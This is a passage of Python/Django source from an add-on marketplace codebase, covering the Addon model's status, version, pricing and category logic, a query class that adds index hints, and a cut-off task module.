# it's fine, set to a dummy string ("never"), when the icon is
# eventually changed, icon_hash will be updated. For regular Addons
# we rely on the modified instead like we always have.
if self.type == amo.ADDON_WEBAPP:
suffix = getattr(self, 'icon_hash', None) or 'never'
else:
suffix = int(time.mktime(self.modified.timetuple()))
return settings.ADDON_ICON_URL % (
split_id.group(2) or 0, self.id, size, suffix)
@write
def update_status(self):
if (self.status in [amo.STATUS_NULL, amo.STATUS_DELETED]
or self.is_disabled or self.is_webapp()):
return
def logit(reason, old=self.status):
log.info('Changing add-on status [%s]: %s => %s (%s).'
% (self.id, old, self.status, reason))
amo.log(amo.LOG.CHANGE_STATUS, self.get_status_display(), self)
versions = self.versions.all()
if not versions.exists():
self.update(status=amo.STATUS_NULL)
logit('no versions')
elif not (versions.filter(files__isnull=False).exists()):
self.update(status=amo.STATUS_NULL)
logit('no versions with files')
elif (self.status == amo.STATUS_PUBLIC and
not versions.filter(files__status=amo.STATUS_PUBLIC).exists()):
if versions.filter(files__status=amo.STATUS_LITE).exists():
self.update(status=amo.STATUS_LITE)
logit('only lite files')
else:
self.update(status=amo.STATUS_UNREVIEWED)
logit('no reviewed files')
@staticmethod
def attach_related_versions(addons, addon_dict=None):
if addon_dict is None:
addon_dict = dict((a.id, a) for a in addons)
current_ids = filter(None, (a._current_version_id for a in addons))
latest_ids = filter(None, (a._latest_version_id for a in addons))
backup_ids = filter(None, (a._backup_version_id for a in addons))
all_ids = set(current_ids) | set(backup_ids) | set(latest_ids)
versions = list(Version.objects.filter(id__in=all_ids).order_by())
for version in versions:
try:
addon = addon_dict[version.addon_id]
except KeyError:
log.debug('Version %s has an invalid add-on id.' % version.id)
continue
if addon._current_version_id == version.id:
addon._current_version = version
if addon._backup_version_id == version.id:
addon._backup_version = version
if addon._latest_version_id == version.id:
addon._latest_version = version
version.addon = addon
@staticmethod
def attach_listed_authors(addons, addon_dict=None):
if addon_dict is None:
addon_dict = dict((a.id, a) for a in addons)
q = (UserProfile.objects.no_cache()
.filter(addons__in=addons, addonuser__listed=True)
.extra(select={'addon_id': 'addons_users.addon_id',
'position': 'addons_users.position'}))
q = sorted(q, key=lambda u: (u.addon_id, u.position))
for addon_id, users in itertools.groupby(q, key=lambda u: u.addon_id):
addon_dict[addon_id].listed_authors = list(users)
# FIXME: set listed_authors to empty list on addons without listed
# authors.
@staticmethod
def attach_previews(addons, addon_dict=None, no_transforms=False):
if addon_dict is None:
addon_dict = dict((a.id, a) for a in addons)
qs = Preview.objects.filter(addon__in=addons,
position__gte=0).order_by()
if no_transforms:
qs = qs.no_transforms()
qs = sorted(qs, key=lambda x: (x.addon_id, x.position, x.created))
for addon, previews in itertools.groupby(qs, lambda x: x.addon_id):
addon_dict[addon].all_previews = list(previews)
# FIXME: set all_previews to empty list on addons without previews.
@staticmethod
def attach_prices(addons, addon_dict=None):
# FIXME: merge with attach_prices transformer below.
if addon_dict is None:
addon_dict = dict((a.id, a) for a in addons)
# There's a constrained amount of price tiers, may as well load
# them all and let cache machine keep them cached.
prices = dict((p.id, p) for p in Price.objects.all())
# Attach premium addons.
qs = AddonPremium.objects.filter(addon__in=addons)
premium_dict = dict((ap.addon_id, ap) for ap in qs)
# Attach premiums to addons, making sure to attach None to free addons
# or addons where the corresponding AddonPremium is missing.
for addon in addons:
if addon.is_premium():
addon_p = premium_dict.get(addon.id)
if addon_p:
price = prices.get(addon_p.price_id)
if price:
addon_p.price = price
addon_p.addon = addon
addon._premium = addon_p
else:
addon._premium = None
@staticmethod
@timer
def transformer(addons):
if not addons:
return
addon_dict = dict((a.id, a) for a in addons)
addons = [a for a in addons if a.type != amo.ADDON_PERSONA]
# Set _backup_version, _latest_version, _current_version
Addon.attach_related_versions(addons, addon_dict=addon_dict)
# Attach listed authors.
Addon.attach_listed_authors(addons, addon_dict=addon_dict)
# Attach previews.
Addon.attach_previews(addons, addon_dict=addon_dict)
# Attach _first_category for Firefox.
cats = dict(AddonCategory.objects.values_list('addon', 'category')
.filter(addon__in=addon_dict,
category__application=amo.FIREFOX.id))
qs = Category.objects.filter(id__in=set(cats.values()))
categories = dict((c.id, c) for c in qs)
for addon in addons:
category = categories[cats[addon.id]] if addon.id in cats else None
addon._first_category[amo.FIREFOX.id] = category
# Attach prices.
Addon.attach_prices(addons, addon_dict=addon_dict)
return addon_dict
@property
def show_beta(self):
return self.status == amo.STATUS_PUBLIC and self.current_beta_version
def show_adu(self):
return self.type not in (amo.ADDON_SEARCH, amo.ADDON_WEBAPP)
@amo.cached_property
def current_beta_version(self):
"""Retrieves the latest version of an addon, in the beta channel."""
versions = self.versions.filter(files__status=amo.STATUS_BETA)[:1]
if versions:
return versions[0]
@property
def icon_url(self):
return self.get_icon_url(32)
def authors_other_addons(self, app=None):
"""
Return other addons by the author(s) of this addon,
optionally takes an app.
"""
if app:
qs = Addon.objects.listed(app)
else:
qs = Addon.objects.valid()
return (qs.exclude(id=self.id)
.exclude(type=amo.ADDON_WEBAPP)
.filter(addonuser__listed=True,
authors__in=self.listed_authors)
.distinct())
@property
def contribution_url(self, lang=settings.LANGUAGE_CODE,
app=settings.DEFAULT_APP):
return reverse('addons.contribute', args=[self.slug])
@property
def thumbnail_url(self):
"""
Returns the addon's thumbnail url or a default.
"""
try:
preview = self.all_previews[0]
return preview.thumbnail_url
except IndexError:
return settings.MEDIA_URL + '/img/icons/no-preview.png'
def can_request_review(self):
"""Return the statuses an add-on can request."""
if not File.objects.filter(version__addon=self):
return ()
if (self.is_disabled or
self.status in (amo.STATUS_PUBLIC,
amo.STATUS_LITE_AND_NOMINATED,
amo.STATUS_DELETED) or
not self.latest_version or
not self.latest_version.files.exclude(status=amo.STATUS_DISABLED)):
return ()
elif self.status == amo.STATUS_NOMINATED:
return (amo.STATUS_LITE,)
elif self.status == amo.STATUS_UNREVIEWED:
return (amo.STATUS_PUBLIC,)
elif self.status == amo.STATUS_LITE:
if self.days_until_full_nomination() == 0:
return (amo.STATUS_PUBLIC,)
else:
# Still in preliminary waiting period...
return ()
else:
return (amo.STATUS_LITE, amo.STATUS_PUBLIC)
def days_until_full_nomination(self):
"""Returns number of days until author can request full review.
If wait period is over or this doesn't apply at all, returns 0 days.
An author must wait 10 days after submitting first LITE approval
to request FULL.
"""
if self.status != amo.STATUS_LITE:
return 0
# Calculate wait time from the earliest submitted version:
qs = (File.objects.filter(version__addon=self, status=self.status)
.order_by('created').values_list('datestatuschanged'))[:1]
if qs:
days_ago = datetime.now() - qs[0][0]
if days_ago < timedelta(days=10):
return 10 - days_ago.days
return 0
def is_webapp(self):
return self.type == amo.ADDON_WEBAPP
@property
def is_disabled(self):
"""True if this Addon is disabled.
It could be disabled by an admin or disabled by the developer
"""
return self.status == amo.STATUS_DISABLED or self.disabled_by_user
@property
def is_deleted(self):
return self.status == amo.STATUS_DELETED
@property
def is_under_review(self):
return self.status in amo.STATUS_UNDER_REVIEW
def is_unreviewed(self):
return self.status in amo.UNREVIEWED_STATUSES
def is_public(self):
return self.status == amo.STATUS_PUBLIC and not self.disabled_by_user
def is_public_waiting(self):
return self.status == amo.STATUS_PUBLIC_WAITING
def is_incomplete(self):
return self.status == amo.STATUS_NULL
def is_pending(self):
return self.status == amo.STATUS_PENDING
def is_rejected(self):
return self.status == amo.STATUS_REJECTED
def can_become_premium(self):
"""
Not all addons can become premium and those that can only at
certain times. Webapps can become premium at any time.
"""
if self.upsell:
return False
if self.type == amo.ADDON_WEBAPP and not self.is_premium():
return True
return (self.status in amo.PREMIUM_STATUSES
and self.highest_status in amo.PREMIUM_STATUSES
and self.type in amo.ADDON_BECOME_PREMIUM)
def is_premium(self):
"""
If the addon is premium. Will include addons that are premium
and have a price of zero. Primarily of use in the devhub to determine
if an app is intending to be premium.
"""
return self.premium_type in amo.ADDON_PREMIUMS
def is_free(self):
"""
This is the opposite of is_premium. Will not include apps that have a
price of zero. Primarily of use in the devhub to determine if an app is
intending to be free.
"""
return not (self.is_premium() and self.premium and
self.premium.price)
def is_free_inapp(self):
return self.premium_type == amo.ADDON_FREE_INAPP
def needs_payment(self):
return (self.premium_type not in
(amo.ADDON_FREE, amo.ADDON_OTHER_INAPP))
def can_be_deleted(self):
return not self.is_deleted
@classmethod
def featured_random(cls, app, lang):
return get_featured_ids(app, lang)
def is_featured(self, app, lang=None):
"""Is add-on globally featured for this app and language?"""
if app:
return self.id in get_featured_ids(app, lang)
def has_full_profile(self):
"""Is developer profile public (completed)?"""
return self.the_reason and self.the_future
def has_profile(self):
"""Is developer profile (partially or entirely) completed?"""
return self.the_reason or self.the_future
@amo.cached_property
def tags_partitioned_by_developer(self):
"""Returns a tuple of developer tags and user tags for this addon."""
tags = self.tags.not_blacklisted()
user_tags = tags.exclude(addon_tags__user__in=self.listed_authors)
dev_tags = tags.exclude(id__in=[t.id for t in user_tags])
return dev_tags, user_tags
@amo.cached_property
def compatible_apps(self):
"""Shortcut to get compatible apps for the current version."""
# Search providers and personas don't list their supported apps.
if self.type in amo.NO_COMPAT:
return dict((app, None) for app in
amo.APP_TYPE_SUPPORT[self.type])
if self.current_version:
return self.current_version.compatible_apps
else:
return {}
def accepts_compatible_apps(self):
"""True if this add-on lists compatible apps."""
return self.type not in amo.NO_COMPAT
def incompatible_latest_apps(self):
"""Returns a list of applications with which this add-on is
incompatible (based on the latest version).
"""
return [a for a, v in self.compatible_apps.items() if v and
version_int(v.max.version) < version_int(a.latest_version)]
def has_author(self, user, roles=None):
"""True if ``user`` is an author with any of the specified ``roles``.
``roles`` should be a list of valid roles (see amo.AUTHOR_ROLE_*). If
not specified, has_author will return true if the user has any role.
"""
if user is None or user.is_anonymous():
return False
if roles is None:
roles = dict(amo.AUTHOR_CHOICES).keys()
return AddonUser.objects.filter(addon=self, user=user,
role__in=roles).exists()
@property
def takes_contributions(self):
return (self.status == amo.STATUS_PUBLIC and self.wants_contributions
and (self.paypal_id or self.charity_id))
@property
def has_eula(self):
return self.eula
@classmethod
def _last_updated_queries(cls):
"""
Get the queries used to calculate addon.last_updated.
"""
status_change = Max('versions__files__datestatuschanged')
public = (
Addon.objects.no_cache().filter(
status=amo.STATUS_PUBLIC,
versions__files__status=amo.STATUS_PUBLIC)
.exclude(type__in=(amo.ADDON_PERSONA, amo.ADDON_WEBAPP))
.values('id').annotate(last_updated=status_change))
lite = (
Addon.objects.no_cache().filter(
status__in=amo.LISTED_STATUSES,
versions__files__status=amo.STATUS_LITE)
.exclude(type=amo.ADDON_WEBAPP)
.values('id').annotate(last_updated=status_change))
stati = amo.LISTED_STATUSES + (amo.STATUS_PUBLIC,)
exp = (Addon.objects.no_cache().exclude(status__in=stati)
.filter(versions__files__status__in=amo.VALID_STATUSES)
.exclude(type=amo.ADDON_WEBAPP)
.values('id')
.annotate(last_updated=Max('versions__files__created')))
webapps = (Addon.objects.no_cache()
.filter(type=amo.ADDON_WEBAPP,
status=amo.STATUS_PUBLIC,
versions__files__status=amo.STATUS_PUBLIC)
.values('id')
.annotate(last_updated=Max('versions__created')))
return dict(public=public, exp=exp, lite=lite, webapps=webapps)
@amo.cached_property(writable=True)
def all_categories(self):
return list(self.categories.all())
@amo.cached_property(writable=True)
def all_previews(self):
return list(self.get_previews())
def get_previews(self):
"""Exclude promo graphics."""
return self.previews.exclude(position=-1)
@property
def app_categories(self):
categories = sorted_groupby(order_by_translation(self.categories.all(),
'name'),
key=lambda x: x.application_id)
app_cats = []
for app_id, cats in categories:
app = amo.APP_IDS.get(app_id)
if app_id and not app:
# Skip retired applications like Sunbird.
continue
app_cats.append((app, list(cats)))
return app_cats
def remove_locale(self, locale):
"""NULLify strings in this locale for the add-on and versions."""
for o in itertools.chain([self], self.versions.all()):
Translation.objects.remove_for(o, locale)
def get_localepicker(self):
"""For language packs, gets the contents of localepicker."""
if (self.type == amo.ADDON_LPAPP and self.status == amo.STATUS_PUBLIC
and self.current_version):
files = (self.current_version.files
.filter(platform__in=amo.MOBILE_PLATFORMS.keys()))
try:
return unicode(files[0].get_localepicker(), 'utf-8')
except IndexError:
pass
return ''
def get_mozilla_contacts(self):
return [x.strip() for x in self.mozilla_contact.split(',')]
@amo.cached_property
def upsell(self):
"""Return the upsell or add-on, or None if there isn't one."""
try:
# We set unique_together on the model, so there will only be one.
return self._upsell_from.all()[0]
except IndexError:
pass
@amo.cached_property
def upsold(self):
"""
Return what this is going to upsold from,
or None if there isn't one.
"""
try:
return self._upsell_to.all()[0]
except IndexError:
pass
def get_purchase_type(self, user):
if user and isinstance(user, UserProfile):
try:
return self.addonpurchase_set.get(user=user).type
except models.ObjectDoesNotExist:
pass
def has_purchased(self, user):
return self.get_purchase_type(user) == amo.CONTRIB_PURCHASE
def is_refunded(self, user):
return self.get_purchase_type(user) == amo.CONTRIB_REFUND
def is_chargeback(self, user):
return self.get_purchase_type(user) == amo.CONTRIB_CHARGEBACK
def can_review(self, user):
if user and self.has_author(user):
return False
else:
return (not self.is_premium() or self.has_purchased(user) or
self.is_refunded(user))
@property
def premium(self):
"""
Returns the premium object which will be gotten by the transformer,
if its not there, try and get it. Will return None if there's nothing
there.
"""
if not hasattr(self, '_premium'):
try:
self._premium = self.addonpremium
except AddonPremium.DoesNotExist:
self._premium = None
return self._premium
@property
def all_dependencies(self):
"""Return all the add-ons this add-on depends on."""
return list(self.dependencies.all()[:3])
def has_installed(self, user):
if not user or not isinstance(user, UserProfile):
return False
return self.installed.filter(user=user).exists()
def get_latest_file(self):
"""Get the latest file from the current version."""
cur = self.current_version
if cur:
res = cur.files.order_by('-created')
if res:
return res[0]
@property
def uses_flash(self):
"""
Convenience property until more sophisticated per-version
checking is done for packaged apps.
"""
f = self.get_latest_file()
if not f:
return False
return f.uses_flash
def in_escalation_queue(self):
return self.escalationqueue_set.exists()
def in_rereview_queue(self):
# Rereview is part of marketplace and not AMO, so setting for False
# to avoid having to catch NotImplemented errors.
return False
def sign_if_packaged(self, version_pk, reviewer=False):
raise NotImplementedError('Not available for add-ons.')
def update_names(self, new_names):
"""
Adds, edits, or removes names to match the passed in new_names dict.
Will not remove the translation of the default_locale.
`new_names` is a dictionary mapping of locales to names.
Returns a message that can be used in logs showing what names were
added or updated.
Note: This method doesn't save the changes made to the addon object.
Don't forget to call save() in your calling method.
"""
updated_locales = {}
locales = dict(Translation.objects.filter(id=self.name_id)
.values_list('locale',
'localized_string'))
msg_c = [] # For names that were created.
msg_d = [] # For deletes.
msg_u = [] # For updates.
# Normalize locales.
names = {}
for locale, name in new_names.iteritems():
loc = find_language(locale)
if loc and loc not in names:
names[loc] = name
# Null out names no longer in `names` but exist in the database.
for locale in set(locales) - set(names):
names[locale] = None
for locale, name in names.iteritems():
if locale in locales:
if not name and locale.lower() == self.default_locale.lower():
pass # We never want to delete the default locale.
elif not name: # A deletion.
updated_locales[locale] = None
msg_d.append(u'"%s" (%s).' % (locales.get(locale), locale))
elif name != locales[locale]:
updated_locales[locale] = name
msg_u.append(u'"%s" -> "%s" (%s).' % (
locales[locale], name, locale))
else:
updated_locales[locale] = names.get(locale)
msg_c.append(u'"%s" (%s).' % (name, locale))
if locales != updated_locales:
self.name = updated_locales
return {
'added': ' '.join(msg_c),
'deleted': ' '.join(msg_d),
'updated': ' '.join(msg_u),
}
def update_default_locale(self, locale):
"""
Updates default_locale if it's different and matches one of our
supported locales.
Returns tuple of (old_locale, new_locale) if updated. Otherwise None.
"""
old_locale = self.default_locale
locale = find_language(locale)
if locale and locale != old_locale:
self.update(default_locale=locale)
return old_locale, locale
return None
@property
def app_type(self):
# Not implemented for non-webapps.
return ''
def check_ownership(self, request, require_owner, require_author,
ignore_disabled, admin):
"""
Used by acl.check_ownership to see if request.user has permissions for
the addon.
"""
if require_author:
require_owner = False
ignore_disabled = True
admin = False
return acl.check_addon_ownership(request, self, admin=admin,
viewer=(not require_owner),
ignore_disabled=ignore_disabled)
dbsignals.pre_save.connect(save_signal, sender=Addon,
dispatch_uid='addon_translations')
class AddonDeviceType(amo.models.ModelBase):
addon = models.ForeignKey(Addon, db_constraint=False)
device_type = models.PositiveIntegerField(
default=amo.DEVICE_DESKTOP, choices=do_dictsort(amo.DEVICE_TYPES),
db_index=True)
class Meta:
db_table = 'addons_devicetypes'
unique_together = ('addon', 'device_type')
def __unicode__(self):
return u'%s: %s' % (self.addon.name, self.device.name)
@property
def device(self):
return amo.DEVICE_TYPES[self.device_type]
@receiver(signals.version_changed, dispatch_uid='version_changed')
def version_changed(sender, **kw):
from . import tasks
tasks.version_changed.delay(sender.id)
@Addon.on_change
def watch_status(old_attr={}, new_attr={}, instance=None,
sender=None, **kw):
"""Set nomination date if self.status asks for full review.
The nomination date will only be set when the status of the addon changes.
The nomination date cannot be reset, say, when a developer cancels their
request for full review and re-requests full review.
If a version is rejected after nomination, the developer has to upload a
new version.
"""
new_status = new_attr.get('status')
if not new_status:
return
addon = instance
stati = (amo.STATUS_NOMINATED, amo.STATUS_LITE_AND_NOMINATED)
if new_status in stati and old_attr['status'] != new_status:
try:
latest = addon.versions.latest()
if not latest.nomination:
latest.update(nomination=datetime.now())
except Version.DoesNotExist:
pass
@Addon.on_change
def watch_disabled(old_attr={}, new_attr={}, instance=None, sender=None, **kw):
attrs = dict((k, v) for k, v in old_attr.items()
if k in ('disabled_by_user', 'status'))
if Addon(**attrs).is_disabled and not instance.is_disabled:
for f in File.objects.filter(version__addon=instance.id):
f.unhide_disabled_file()
if instance.is_disabled and not Addon(**attrs).is_disabled:
for f in File.objects.filter(version__addon=instance.id):
f.hide_disabled_file()
def attach_devices(addons):
addon_dict = dict((a.id, a) for a in addons if a.type == amo.ADDON_WEBAPP)
devices = (AddonDeviceType.objects.filter(addon__in=addon_dict)
.values_list('addon', 'device_type'))
for addon, device_types in sorted_groupby(devices, lambda x: x[0]):
addon_dict[addon].device_ids = [d[1] for d in device_types]
def attach_prices(addons):
addon_dict = dict((a.id, a) for a in addons)
prices = (AddonPremium.objects
.filter(addon__in=addon_dict,
addon__premium_type__in=amo.ADDON_PREMIUMS)
.values_list('addon', 'price__price'))
for addon, price in prices:
addon_dict[addon].price = price
def attach_categories(addons):
"""Put all of the add-on's categories into a category_ids list."""
addon_dict = dict((a.id, a) for a in addons)
categories = (Category.objects.filter(addoncategory__addon__in=addon_dict)
.values_list('addoncategory__addon', 'id'))
for addon, cats in sorted_groupby(categories, lambda x: x[0]):
addon_dict[addon].category_ids = [c[1] for c in cats]
def attach_translations(addons):
"""Put all translations into a translations dict."""
attach_trans_dict(Addon, addons)
def attach_tags(addons):
addon_dict = dict((a.id, a) for a in addons)
qs = (Tag.objects.not_blacklisted().filter(addons__in=addon_dict)
.values_list('addons__id', 'tag_text'))
for addon, tags in sorted_groupby(qs, lambda x: x[0]):
addon_dict[addon].tag_list = [t[1] for t in tags]
class AddonCategory(caching.CachingMixin, models.Model):
addon = models.ForeignKey(Addon)
category = models.ForeignKey('Category')
feature = models.BooleanField(default=False)
feature_locales = models.CharField(max_length=255, default='', null=True)
objects = caching.CachingManager()
class Meta:
db_table = 'addons_categories'
unique_together = ('addon', 'category')
def flush_urls(self):
urls = ['*/addon/%d/' % self.addon_id,
'*%s' % self.category.get_url_path(), ]
return urls
class AddonType(amo.models.ModelBase):
name = TranslatedField()
name_plural = TranslatedField()
description = TranslatedField()
class Meta:
db_table = 'addontypes'
def __unicode__(self):
return unicode(self.name)
def get_url_path(self):
try:
type = amo.ADDON_SLUGS[self.id]
except KeyError:
return None
return reverse('browse.%s' % type)
dbsignals.pre_save.connect(save_signal, sender=AddonType,
dispatch_uid='addontype_translations')
class AddonUser(caching.CachingMixin, models.Model):
addon = models.ForeignKey(Addon)
user = UserForeignKey()
role = models.SmallIntegerField(default=amo.AUTHOR_ROLE_OWNER,
choices=amo.AUTHOR_CHOICES)
listed = models.BooleanField(_(u'Listed'), default=True)
position = models.IntegerField(default=0)
objects = caching.CachingManager()
def __init__(self, *args, **kwargs):
super(AddonUser, self).__init__(*args, **kwargs)
self._original_role = self.role
self._original_user_id = self.user_id
class Meta:
db_table = 'addons_users'
def flush_urls(self):
return self.addon.flush_urls() + self.user.flush_urls()
class Category(amo.models.OnChangeMixin, amo.models.ModelBase):
name = TranslatedField()
slug = amo.models.SlugField(max_length=50,
help_text='Used in Category URLs.')
type = models.PositiveIntegerField(db_column='addontype_id',
choices=do_dictsort(amo.ADDON_TYPE))
application = models.ForeignKey('applications.Application', null=True,
blank=True)
count = models.IntegerField('Addon count', default=0)
weight = models.IntegerField(
default=0, help_text='Category weight used in sort ordering')
misc = models.BooleanField(default=False)
addons = models.ManyToManyField(Addon, through='AddonCategory')
class Meta:
db_table = 'categories'
verbose_name_plural = 'Categories'
def __unicode__(self):
return unicode(self.name)
def flush_urls(self):
urls = ['*%s' % self.get_url_path(), ]
return urls
def get_url_path(self):
return '/search?cat=%s' % self.slug
@staticmethod
def transformer(addons):
qs = (Category.objects.no_cache().filter(addons__in=addons)
.extra(select={'addon_id': 'addons_categories.addon_id'}))
cats = dict((addon_id, list(cs))
for addon_id, cs in sorted_groupby(qs, 'addon_id'))
for addon in addons:
addon.all_categories = cats.get(addon.id, [])
def clean(self):
if self.slug.isdigit():
raise ValidationError('Slugs cannot be all numbers.')
@Category.on_change
def reindex_cat_slug(old_attr=None, new_attr=None, instance=None,
sender=None, **kw):
"""ES reindex category's apps if category slug changes."""
from mkt.webapps.tasks import index_webapps
if new_attr.get('type') != amo.ADDON_WEBAPP:
instance.save()
return
slug_changed = (instance.pk is not None and old_attr and new_attr and
old_attr.get('slug') != new_attr.get('slug'))
instance.save()
if slug_changed:
index_webapps(list(instance.addon_set.filter(type=amo.ADDON_WEBAPP)
.values_list('id', flat=True)))
dbsignals.pre_save.connect(save_signal, sender=Category,
dispatch_uid='category_translations')
class Feature(amo.models.ModelBase):
addon = models.ForeignKey(Addon)
start = models.DateTimeField()
end = models.DateTimeField()
locale = models.CharField(max_length=10, default='', blank=True, null=True)
application = models.ForeignKey('applications.Application')
class Meta:
db_table = 'features'
def __unicode__(self):
app = amo.APP_IDS[self.application.id].pretty
return '%s (%s: %s)' % (self.addon.name, app, self.locale)
class Preview(amo.models.ModelBase):
addon = models.ForeignKey(Addon, related_name='previews')
filetype = models.CharField(max_length=25)
thumbtype = models.CharField(max_length=25)
caption = TranslatedField()
position = models.IntegerField(default=0)
sizes = json_field.JSONField(max_length=25, default={})
class Meta:
db_table = 'previews'
ordering = ('position', 'created')
def flush_urls(self):
urls = ['*/addon/%d/' % self.addon_id,
self.thumbnail_url,
self.image_url, ]
return urls
def _image_url(self, url_template):
if self.modified is not None:
modified = int(time.mktime(self.modified.timetuple()))
else:
modified = 0
args = [self.id / 1000, self.id, modified]
if '.png' not in url_template:
args.insert(2, self.file_extension)
return url_template % tuple(args)
def _image_path(self, url_template):
args = [self.id / 1000, self.id]
if '.png' not in url_template:
args.append(self.file_extension)
return url_template % tuple(args)
def as_dict(self, src=None):
d = {'full': urlparams(self.image_url, src=src),
'thumbnail': urlparams(self.thumbnail_url, src=src),
'caption': unicode(self.caption)}
return d
@property
def is_landscape(self):
size = self.image_size
if not size:
return False
return size[0] > size[1]
@property
def file_extension(self):
# Assume that blank is an image.
if not self.filetype:
return 'png'
return self.filetype.split('/')[1]
@property
def thumbnail_url(self):
return self._image_url(settings.PREVIEW_THUMBNAIL_URL)
@property
def image_url(self):
return self._image_url(settings.PREVIEW_FULL_URL)
@property
def thumbnail_path(self):
return self._image_path(settings.PREVIEW_THUMBNAIL_PATH)
@property
def image_path(self):
return self._image_path(settings.PREVIEW_FULL_PATH)
@property
def thumbnail_size(self):
return self.sizes.get('thumbnail', []) if self.sizes else []
@property
def image_size(self):
return self.sizes.get('image', []) if self.sizes else []
dbsignals.pre_save.connect(save_signal, sender=Preview,
dispatch_uid='preview_translations')
class AppSupport(amo.models.ModelBase):
"""Cache to tell us if an add-on's current version supports an app."""
addon = models.ForeignKey(Addon)
app = models.ForeignKey('applications.Application')
min = models.BigIntegerField("Minimum app version", null=True)
max = models.BigIntegerField("Maximum app version", null=True)
class Meta:
db_table = 'appsupport'
unique_together = ('addon', 'app')
class Charity(amo.models.ModelBase):
name = models.CharField(max_length=255)
url = models.URLField()
paypal = models.CharField(max_length=255)
class Meta:
db_table = 'charities'
@property
def outgoing_url(self):
if self.pk == amo.FOUNDATION_ORG:
return self.url
return get_outgoing_url(unicode(self.url))
class BlacklistedSlug(amo.models.ModelBase):
name = models.CharField(max_length=255, unique=True, default='')
class Meta:
db_table = 'addons_blacklistedslug'
def __unicode__(self):
return self.name
@classmethod
def blocked(cls, slug):
return slug.isdigit() or cls.objects.filter(name=slug).exists()
class AddonUpsell(amo.models.ModelBase):
free = models.ForeignKey(Addon, related_name='_upsell_from')
premium = models.ForeignKey(Addon, related_name='_upsell_to')
class Meta:
db_table = 'addon_upsell'
unique_together = ('free', 'premium')
def __unicode__(self):
return u'Free: %s to Premium: %s' % (self.free, self.premium)
@amo.cached_property
def premium_addon(self):
"""
Return the premium version, or None if there isn't one.
"""
try:
return self.premium
except Addon.DoesNotExist:
pass
def cleanup(self):
try:
# Just accessing these may raise an error.
assert self.free and self.premium
except ObjectDoesNotExist:
log.info('Deleted upsell: from %s, to %s' %
(self.free_id, self.premium_id))
self.delete()
def cleanup_upsell(sender, instance, **kw):
if 'raw' in kw:
return
both = Q(free=instance) | Q(premium=instance)
for upsell in list(AddonUpsell.objects.filter(both)):
upsell.cleanup()
dbsignals.post_delete.connect(cleanup_upsell, sender=Addon,
dispatch_uid='addon_upsell')
# webapps.models imports addons.models to get Addon, so we need to keep the
# Webapp import down here.
from mkt.webapps.models import Webapp
########NEW FILE########
__FILENAME__ = query
from django.db import models
from django.db.models.sql import compiler
import caching.base as caching
class IndexQuerySet(caching.CachingQuerySet):
def with_index(self, **kw):
"""
Suggest indexes that should be used with this query as key-value pairs.
qs.with_index(t1='xxx') => INNER JOIN t1 USE INDEX (`xxx`)
"""
q = self._clone()
if not isinstance(q.query, IndexQuery):
q.query = self.query.clone(IndexQuery)
q.query.index_map.update(kw)
return q
def fetch_missed(self, pks):
# Remove the indexes before doing the id query.
if hasattr(self.query, 'index_map'):
index_map = self.query.index_map
self.query.index_map = {}
rv = super(IndexQuerySet, self).fetch_missed(pks)
self.query.index_map = index_map
return rv
else:
return super(IndexQuerySet, self).fetch_missed(pks)
class IndexQuery(models.query.sql.Query):
"""
Extends sql.Query to make it possible to specify indexes to use.
"""
def clone(self, klass=None, **kwargs):
# Maintain index_map across clones.
c = super(IndexQuery, self).clone(klass, **kwargs)
c.index_map = dict(self.index_map)
return c
def get_compiler(self, using=None, connection=None):
# Call super to figure out using and connection.
c = super(IndexQuery, self).get_compiler(using, connection)
return IndexCompiler(self, c.connection, c.using)
def _setup_query(self):
if not hasattr(self, 'index_map'):
self.index_map = {}
def get_count(self, using):
# Don't use the index for counts, it's slower.
index_map = self.index_map
self.index_map = {}
count = super(IndexQuery, self).get_count(using)
self.index_map = index_map
return count
class IndexCompiler(compiler.SQLCompiler):
def get_from_clause(self):
"""
Returns a list of strings that are joined together to go after the
"FROM" part of the query, as well as a list any extra parameters that
need to be included. Sub-classes, can override this to create a
from-clause via a "select".
This should only be called after any SQL construction methods that
might change the tables we need. This means the select columns and
ordering must be done first.
"""
result = []
qn = self.quote_name_unless_alias
qn2 = self.connection.ops.quote_name
index_map = self.query.index_map
first = True
from_params = []
for alias in self.query.tables:
if not self.query.alias_refcount[alias]:
continue
try:
name, alias, join_type, lhs, join_cols, _, join_field = self.query.alias_map[alias]
except KeyError:
# Extra tables can end up in self.tables, but not in the
# alias_map if they aren't in a join. That's OK. We skip them.
continue
alias_str = (alias != name and ' %s' % alias or '')
### jbalogh wuz here. ###
if name in index_map:
use_index = 'USE INDEX (%s)' % qn(index_map[name])
else:
use_index = ''
if join_type and not first:
extra_cond = join_field.get_extra_restriction(
self.query.where_class, alias, lhs)
if extra_cond:
extra_sql, extra_params = extra_cond.as_sql(
qn, self.connection)
extra_sql = 'AND (%s)' % extra_sql
from_params.extend(extra_params)
else:
extra_sql = ""
result.append('%s %s%s %s ON ('
% (join_type, qn(name), alias_str, use_index))
for index, (lhs_col, rhs_col) in enumerate(join_cols):
if index != 0:
result.append(' AND ')
result.append('%s.%s = %s.%s' %
(qn(lhs), qn2(lhs_col), qn(alias), qn2(rhs_col)))
result.append('%s)' % extra_sql)
else:
connector = connector = '' if first else ', '
result.append('%s%s%s %s' % (connector, qn(name), alias_str, use_index))
### jbalogh out. ###
first = False
for t in self.query.extra_tables:
alias, unused = self.query.table_alias(t)
# Only add the alias if it's not already present (the table_alias()
# calls increments the refcount, so an alias refcount of one means
# this is the only reference.
if alias not in self.query.alias_map or self.query.alias_refcount[alias] == 1:
connector = not first and ', ' or ''
result.append('%s%s' % (connector, qn(alias)))
first = False
return result, from_params
########NEW FILE########
__FILENAME__ = signals
import django.dispatch
version_changed = django.dispatch.Signal()
########NEW FILE########
__FILENAME__ = tasks
import logging
from django.core.files.storage import default_storage as storage
from django.db import connection, transaction
from celeryutils import task
import amo
from amo.decorators import write
# pulling tasks from cron
from . import cron # NOQA
from .models import Addon, Preview
log = logging.getLogger('z.task')
@task
@write
def version_changed(addon_id, **kw):
update_last_updated(addon_id)
update_appsupport([addon_id])
def update_last_updated(addon_id):
queries = Addon._last_updated_queries()
try:
addon = Addon.objects.get(pk=addon_id)
except Addon.DoesNotExist:
log.info('[1@None] Updating last updated for %s failed, no addon found'
% addon_id)
return
log.info('[1@None] Updating last updated for %s.' % addon_id)
if addon.is_webapp():
q = 'webapps'
elif addon.status == amo.STATUS_PUBLIC:
q = 'public'
else:
q = 'exp'
qs = queries[q].filter(pk=addon_id).using('default')
res = qs.values_list('id', 'last_updated')
if res:
pk, t = res[0]
Addon.objects.filter(pk=pk).update(last_updated=t)
